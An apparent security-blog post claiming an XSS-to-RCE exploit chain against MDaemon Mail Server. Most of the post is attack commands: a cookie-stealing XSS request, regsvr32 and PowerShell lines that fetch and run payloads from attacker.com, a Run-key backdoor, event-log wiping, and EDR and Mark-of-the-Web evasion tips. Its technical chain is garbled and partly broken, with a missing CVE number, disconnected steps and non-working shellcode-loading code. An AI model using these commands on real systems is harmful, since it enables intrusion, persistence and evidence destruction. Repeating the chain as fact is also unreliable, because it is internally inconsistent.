Exploiting MDaemon Mail Server Vulnerability: Reflected XSS to RCE (CVE–)

By /

Listen to this Post

A critical vulnerability in MDaemon Mail Server allows attackers to achieve Remote Code Execution (RCE) via a Reflected XSS vulnerability, leading to DLL Hijacking and persistence. This vulnerability, CVE-2021-27180, can be exploited using GHOST_WEB_SHELL and In-Memory Injection via HTTP protocol.

Proof of Concept (PoC) & Demo

Evasion & Anti-Forensic Techniques

1. Encrypt shellcode and decrypt at runtime.

2. Indirect Syscalls (API Hooking evasion).

3. Store shellcode in `.rsrc` section.

  1. Delay execution until the first HTTP request (HttpExtensionProc).

Bypassing Security Measures

  • Bypass MOTW (Mark of the Web) for RCE via phishing.
  • Kaspersky Bypass for EDR evasion.

You Should Know: Practical Exploitation Steps

1. Exploiting Reflected XSS for RCE

  • Craft a malicious HTTP request with XSS payload: 
    GET /vulnerable_endpoint?param=<script>alert(document.cookie)</script> HTTP/1.1 
Host: target_mdaemon_server
  • Upgrade to RCE via DLL Hijacking: 
    regsvr32 /s /n /u /i:http://attacker.com/malicious.sct scrobj.dll

2. In-Memory Injection via HTTP

  • Use PowerShell to load malicious DLL: 
    $bytes = (Invoke-WebRequest -Uri "http://attacker.com/shellcode.bin").Content 
$ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length) 
[System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $ptr, $bytes.Length) 
$thread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, [System.Delegate]) 
$thread.Invoke()

3. Persistence via Registry

  • Add a backdoor to Run Keys: 
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "UpdateCheck" /t REG_SZ /d "C:\malware.exe" /f

4. Anti-Forensic Cleanup

  • Clear Windows Event Logs: 
    wevtutil cl Security 
wevtutil cl System

What Undercode Say

This exploit demonstrates how low-severity vulnerabilities (XSS) can escalate to full system compromise (RCE). Defenders should:
– Patch MDaemon to the latest version.
– Monitor DLL loading in w3wp.exe.
– Block suspicious HTTP requests with SIEM rules (SPLUNK/ELK).
– Restrict PowerShell execution in critical servers.

Expected Output:

  • Successful RCE via XSS → DLL Hijacking → Persistence.
  • Evasion of Kaspersky & MOTW restrictions.
  • Memory-resident shellcode execution.

Relevant URLs:

References:

Reported By: Hassan Sohrabian – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: